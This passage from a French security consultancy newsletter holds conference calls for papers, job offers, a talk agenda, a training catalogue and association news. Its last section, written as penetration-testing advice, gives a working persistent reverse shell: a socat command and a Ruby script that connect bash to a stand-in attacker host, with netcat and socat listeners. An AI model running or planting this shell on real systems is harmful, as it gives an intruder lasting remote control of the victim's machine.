  - Cohabitation solutions étrangères / solutions françaises
  - En 2015, quel modèle pour la stratégie de défense en profondeur ?

     Si un sujet pertinent n'est pas présent dans cette liste, n'hésitez
 surtout pas à soumettre votre proposition.

 Des propositions d'intervention portant sur ces différents aspects de la
 sécurité sont sollicitées pour la JSSI 2015. Les interventions pourront
 inclure la présentation d'une démarche, d'une technique ou d'une solution
 de sécurité répondant à une problématique d'entreprise ou d'organisme public
 et être illustrées d'une expérience pratique de mise en oeuvre.
 Toute présentation strictement commerciale sera refusée.

     Les propositions de contribution sont attendues avant le 5 janvier 2015.
 Les propositions d'intervention, en français ou en anglais, précisant le
 sujet et le plan sur une page, doivent être accompagnées de quelques
 transparents et d'une brève biographie de l'auteur. Envoyez vos propositions
 dans l'un des formats : texte simple, PDF ou HTML, par e-mail à l'adresse :
 jssi15 at ossir.org

     Conférence organisée par l'OSSIR - Observatoire de la Sécurité des
 Systèmes d'Information et des Réseaux - Association loi 1901
 http://www.ossir.org



--[ 8. Appel à communication : GS-DAYS 2015  ]---------------------------

     La 6ème édition des GS Days se déroulera le 24 mars 2015 à l'Espace
 Saint-Martin au coeur de Paris, 199 bis, rue Saint-Martin, 75003 Paris.
 L'objectif des GS-Days, Journées francophones de la sécurité, est d'établir
 le dialogue entre le monde de la technique (administrateurs, experts
 sécurité), les RSSI, DSI et les décideurs. Ce colloque, exclusivement en
 français, propose dans un même espace plusieurs cycles de conférences et
 de démonstrations d'exploitation de faille informatique, sous un angle
 technique, organisationnel et juridique.

     Quelques exemples de thèmes sur lesquels nous attendons des soumissions :

 * Systèmes embarqués : objets connectés, systèmes industriels
    - Quelles attaques sur le matériel ?
    - Comment intégrer la sécurité dans ces équipements ?
    - Comment cloisonner le risque ?

 * Mobilité
    - Quelles politiques d'entreprise : BYOD ou COPE ?
    - Nouveaux usages connectés : domotique, m-payment, m-banking ?
    - Les nouvelles attaques orientées terminaux, applications des market
    - Quel niveau de sécurité pour les solutions de MDM ?
    - Quelles contre-mesures à apporter ?

 * Attaques ciblées de haut niveau
    - Synthèse de l'affaire Snowden
    - Arsenal des moyens d'attaques des Etats : matériel ou logiciel,
      botnets étatiques, DDOS
    - Quelle confiance dans les fournisseurs et matériel ?
    - Est-il possible de se protéger ?

 * Gouvernance de l'information 2.0
    - Risques et enjeux de la maîtrise et du partage de grande quantité
      d'informations : Cloud, Big Data, Data Mining
    - Quels enjeux pour le droit français et européen ?

 * Facteurs humains
    - L'ingénierie sociale au travers des réseaux sociaux et autres cercles
      de confiance
    - Nouveaux modes de sensibilisation : e-learning et serious game

 * Continuité et reprise d'activité
    - Quelle place pour l'ISO22301 ?
    - Comment gérer et communiquer une crise ?

 * Régulation
    - Quels effets de la Loi de Programmation Militaire (LPM), des nouvelles
      Directives Nationales de Sécurité (DNS), de la PSSI d l'Etat ?
    - Quels effets du RGSv2 pour les autorités administratives ?
    - Le droit peut-il encore quelque chose pour la protection de
      l'information ? Protection de la vie privée ? Secret des affaires ?

     Les présentations attendues devront proposer une vision technique ou
 scientifique. Les présentations à fin commerciale ou la présentation d'un
 produit ne seront pas acceptées. Cependant, les propositions présentant une
 analyse technique de la sécurité d'un produit, un comparatif fondé sur des
 tests scientifiques, et les retours d'expérience avec un aspect
 technologique, seront examinées avec attention.

 Le format des conférences sera de 50 minutes, dont 5 à 10 minutes de
 questions.

     Le comité de Programme est assuré par Global Security Mag, Florence
 Hanczakowski, CLUSIF, Hervé Schauer, HSC, Philippe Humeau, NBS System,
 Paul Such, SCRT, Olivier Revenu, EdelWeb, Maître Diane Mullenex, Cabinet
 Pinsent Masons, Eric Doyen, Vice-président du Club 27001, et Emmanuel Garnier,
 Systalians. Ce comité a pour objectif la sélection des conférenciers et
 du contenu du Colloque.

 Contenu des soumissions à envoyer à Marc.Jacob at globalsecuritymag.com :
    - Nom de l'auteur, biographie et affiliation
    - Catégorie de la soumission (technique/organisationelle/juridique)
    - Synopsis d'une à 2 pages de l'intervention avec un plan de celle-ci
    - Format PDF préféré.

  Calendrier
     - 9 janvier 2015 : date limite de réception des soumissions
     - 26 janvier 2015 : notification aux auteurs
     - 13 mars 2015 : réception des présentations définitives
     - 24 mars 2015 de 8h30 à 18h30 : conférence

 Inscription obligatoire déjà ouverte sur http://www.gsdays.fr/

 Utilisez le code d'HSC pour vous inscrire : 205Bax07, et bénéficiez d'un
 tarif réduit de 120 euros HT au lieu de 150 euros HT.



--[ 9. Offres d'emploi HSC pour consultants en sécurité & continuité ]---

     HSC recherche des consultants brillants, débutants ou expérimentés,
 avides de partager et de s'épanouir dans une équipe indépendante,
 pluri-disciplinaire, qui couvre tous les aspects liés à la sécurité et
 continuité, des tests d'intrusion à l'expertise judiciaire, de la
 rétroingénierie à la gouvernance, des systèmes industriels et embarqués à
 la gestion des risques, des technologies sans-fil à la résilience, de
 l'inforensique à l'ingénierie sociale, etc, pour des missions d'expertise
 variées et haut-de-gamme.

     Les ingénieurs sélectionnés pourront être formés à la sécurité par HSC
 (intrusion, inforensique, Windows, SCADA, ISO27001, ISO22301, ISO27005,
 EBIOS, etc.), soit 2 à 6 semaines de formations suivies dans le cadre de
 la prise de fonction.

     HSC recherche également des stagiaires pour des stages de pré-embauche.

     Tous les postes sont basés à Neuilly-sur-Seine (Paris), au pied du métro
 Pont de Neuilly (ligne n° 1). Si vous souhaitez proposer votre candidature,
 nous vous remercions d'envoyer votre CV en texte ASCII (pas de .doc ni .docx)
 par courrier électronique à cv at hsc.fr.



--[ 10. Agenda des interventions publiques ]------------------------------

 - 9 décembre - matinée CNIS-Mag - Hôtel Intercontinental Paris
   "Administration de la Sécurité, Gestion d'identité & Maîtrise des données"
   Conférence d'introduction "Risques d'une mauvaise administration de la
   sécurité" par Hervé Schauer et participation à la table-ronde.

 - 18 décembre 2014 - Conférence Clusif - CCI Paris
   "Systèmes industriels et sécurité de l'information : comment les
   rapprocher ?".
   Présentation des travaux du groupe de travail du Clusif SCADA et
   participation à la table-ronde - Hervé Schauer
   http://www.clusif.fr/

 - 14 janvier 2015, - Panorama annuel de la cybercriminalité du Clusif -
   Paris, CCI de Paris
   Intervention d'Hervé Schauer
   http://www.clusif.fr/

 - 2 avril 2015 - Security Day Luxembourg - Luxembourg
   Présentation technique en cours de confirmation.

 Retrouvez l'agenda de nos interventions publiques sur
 http://www.hsc.fr/conferences/agenda.html.fr



--[ 11. Prochaines formations HSC ]--------------------------------------

     Nos prochaines formations sont les suivantes :

 - Paris
        Formation CISSP    .....................    : 8 au 12 décembre (#)
        Essentiels techniques de la SSI    .....    : 9 et 10 décembre
        Mesures de sécurité ISO 27002:2013   ...    : 9 et 10 décembre
        Indicateurs & tableaux de bord SSI/ISO27004 : 11 décembre
        Gestion des incidents de sécurité/ISO27035  : 12 décembre
        Essentiels juridiques pour gérer la SSI     : 11 et 12 décembre
        ISO 27005 Risk Manager    ..............    : 15 au 17 décembre (#)
        Risk Manager Avancé    .................    : 18 et 19 décembre
        ISO 27001 Lead Implementer    ..........    : 15 au 19 décembre (#)
        ISO 27005 Risk Manager    ..............    : 21 au 23 janvier 2015 (#)
        ISO 27001 Lead Implementer    ..........    : 26 au 30 janvier (#)
        Expert Sécurité Linux LPI 303   ........    : 26 au 30 janvier (*)(#)
        ISO 22301 Lead Implementer    ..........    : 2 au 6 février (#)
        Essentiels de l'ISO27001:2013    .......    : 6 février
        Formation CISSP    .....................    : 2 au 6 mars (#)
        ISO 27001 Lead Auditor    ..............    : 16 au 20 mars (#)
        Tests d'intrusion avancés, exploits,
        hacking éthique (SANS SEC560 / GIAC GPEN)   : 16 au 20 mars (*)(#)
        Techniques de hacking, exploitation de failles
        et gestion des incidents (SEC504/GCIH)      : 23 au 27 mars 2015 (*)(#)
        Formation RSSI    ......................    : 30 mars au 3 avril
        Correspondant Informatique et Libertés      : 8 au 10 avril (@)
        ISO 22301 Lead Auditor    ..............    : 13 au 17 avril (#)
        Fondamentaux & principes de la SSI
        (SANS SEC401/GIAC GSEC)   ..............    : 13 au 18 avril (*)(#)
        Inforensique Windows (SANS FOR408/GIAC GCFE): 20 au 24 avril (*)(#)
        PKI : principes et mise en oeuvre    ...    : 4 au 6 mai 2015 (*)
        Essentiels Informatique et Liberté   ...    : 18 mai
        Essentiels juridiques pour gérer la SSI     : 21 et 22 mai
        Sécurité du Cloud Computing    .........    : 26 au 28 mai
        Essentiel de PCI-DSS    ................    : 28 mai
        RGS : la SSI pour le secteur public    .    : 29 mai
        Gestion de crise IT/SSI    .............    : 19 juin 2015
        Inforensique réseau avancée (SANS FOR572)   : 1 au 5 juin 2015 (*)
        Essentiels de l'ISO22301    ............    : 11 septembre
        Protéger les applis web (DEV522 /GIAC GWEB) : 28 sep au 2 oct (*)(#)
        Analyse Inforensique avancée et réponse aux
        incidents (SANS FOR508 / GIAC GCFA)    .    : 2 au 6 novembre (*)(#)
        Sécurité du WiFi    ....................    : 9 et 10 novembre (*)
        Inforensique ordiphones/tablettes (FOR585)  : 16 au 20 novembre (*)(#)
        Tests d'intrusion avancés des applications
        web et hacking éthique (SANS SEC642)  ...   : 23 au 27 novembre (*)
        Sécuriser Windows (SANS SEC505/GIAC GCWN)   : 14 au 18 décembre (*)(#)

 (*) : formations avec travaux pratiques, avec un ordinateur par stagiaire
 (#) : formations certifiantes par LSTI, ISC2, GIAC ou LPI
 (@) : formation labellisée par la CNIL (www.cnil.fr)
 (C) : session de formation complète

 - Luxembourg
        ISO 22301 Lead Implementer    ..........    : 2 au 6 mars 2015 (#)
        Formation CISSP    .....................    : 18 au 22 mai (#)
        ISO 27005 Risk Manager    ..............    : 3 au 5 juin (#)
        ISO 27001 Lead Implementer    ..........    : 22 au 26 juin (#)

 - Lille
        Correspondant Informatique et Libertés      : 16 au 18 mars 2015 (@)

 - Lyon
        Correspondant Informatique et Libertés      : 4 au 6 mai 2015 (@)

 - Marseille
        Correspondant Informatique et Libertés      : 22 au 24 avril 2015 (@)

 - Rennes
        Correspondant Informatique et Libertés      : 8 au 10 juin (@)

 - Strasbourg
        Correspondant Informatique et Libertés      : 22 au 24 juin (@)

 - Toulouse
        Correspondant Informatique et Libertés .    : 21 au 23 janvier (@)
        ISO 27001 Lead Implementer    ..........    : 12 au 16 octobre (#)
        Correspondant Informatique et Libertés .    : 4 au 6 novembre (@)
        ISO 27005 Risk Manager    ..............    : 19 au 21 novembre (#)

 (#) : formations certifiantes
 (@) : formation labellisée par la CNIL (www.cnil.fr)

 HSC est certifiée OPQF (http://www.opqf.com/) et ISO9001 par Intertek sur
 ses formations.

 Pour tout renseignement ou inscription, contactez Lynda Benchikh :
 formations at hsc.fr -- +33 158 379 042

 Retrouvez le détail de nos formations (plan pédagogique, agenda) ainsi que
 notre catalogue 2015 en PDF sur http://www.hsc-formation.fr/



--[ 12. Actualité des associations : Club 27001, OSSIR et Clusif ]--------

  o Club 27001 (http://www.club-27001.fr/)
     . Prochaine réunion à Paris jeudi 23 janvier 2015 chez Solucom
         - "Le logiciel Score Compliance" par Thierry Ramard (Ageris)
         - Faites de propositions pour la secondes présentation
     . Prochaine réunion à Toulouse le vendredi 12 décembre chez Apsys
         - Présentation de PCI-DSS et de son positionnement par rapport
           à l'ISO 270xx par Hervé Hosy (Oppida)
         - Retour sur les normes de vie privée et lien avec la 270XX
          par Lionel Vodzislawsky (Celtipharm)
     . Autres prochaines réunions annoncées sur
       www.club-27001.fr et dans les listes électroniques. Inscrivez-vous
       sur les listes de chaque ville sur www.club-27001.fr pour suivre
       l'activité du Club 27001 en région.

 o OSSIR (http://www.ossir.org/)
     . Prochaine réunion à Paris le mardi 9 décembre à l'INRIA
         - "PolyXene - Socle de Confiance" par Erwan Le Disez
         - "SELKS et Suricata" par Eric Leblond
         - Revue de vulnérabilités
     . Réunion suivante à Paris le mardi 13 janvier 2015 avec l'AG annuelle
     . Prochaine réunion à Toulouse mardi 16 décembre
         - "Développement de moyens matériels pour la protection des couches
            basses du logiciel" par Benoît Morgan (LAAS/CNRS)
         - Seconde présentation en cours de confirmation
     . Réunion suivante à Toulouse mardi 17 février 2015
         - "Présentation et utilisation avancées de Mimikatz" par Benjamin
           Delpy
         - "Solution du Challenge SSTIC 2014" par Vincent Fargues (Thales)
     . Prochaine réunion à Rennes non planifiée.

 o Clusif (http://www.clusif.fr/)
     . Prochaine conférence mardi 18 décembre à 16h00 à la CCI Paris
       http://www.clusif.fr/ sur la sécurité SCADA.
     . Panorama annuel de la cybercriminalité le 14 janvier 2015
       http://www.clusif.fr/



--[ 13. Le saviez-vous ? La réponse ]------------------------------------

     Malheureusement, nous ne connaissons aucun moyen simple. socat permet bien
 d'avoir un comportement similaire à celui espérer avec la commande suivante
 lancée du côté de la victime :
   socat -v exec:'bash -i',pty,stderr,setsid,sigint,sane tcp:pentest.attaquant.fr:4444,forever,interval=1,fork

 et la commande suivante côté attaquant :
   socat - TCP-LISTEN:4444,forever,interval=1,fork

 On obtient alors un reverse shell persistant. Cependant cette commande va
 créer un nouveau processus socat toutes les secondes, risquant ainsi d'épuiser
 les ressources du serveur de la victime.

 Une solution possible est d'écrire un script qui gère manuellement la
 connexion TCP pour la relancer si elle est coupée sans mettre fin au shell.
 Le script ruby suivant met en place une solution de ce type :

  require 'pty'
  require 'socket'

  def doconnect()
    begin
      s = TCPSocket.new 'pentest.attaquant.fr', 4444
      return s
    rescue
      sleep(1)
      retry
    end
  end

  PTY.spawn("/bin/bash") {|r, w, pid|
    socket = doconnect
    loop do
      r_s = select([r, socket]);
      output = (r_s[0][0] == socket) ? w : socket
      begin
        out = r_s[0][0].read_nonblock(1024)
        output.write(out)
      rescue EOFError
        socket = doconnect
      end
    end
  }

 Sur la machine de l'attaquant il suffit de lancer un netcat en écoute :
  while true; do nc -nlp 4444; done

 Si vous connaissez d'autres façons de contourner ce problème, vous pouvez nous
 les envoyer en répondant à cette newsletter. Les solutions les plus élégantes
 seront publiées dans notre newsletter de janvier.



Plus d'informations sur la liste de diffusion newsletter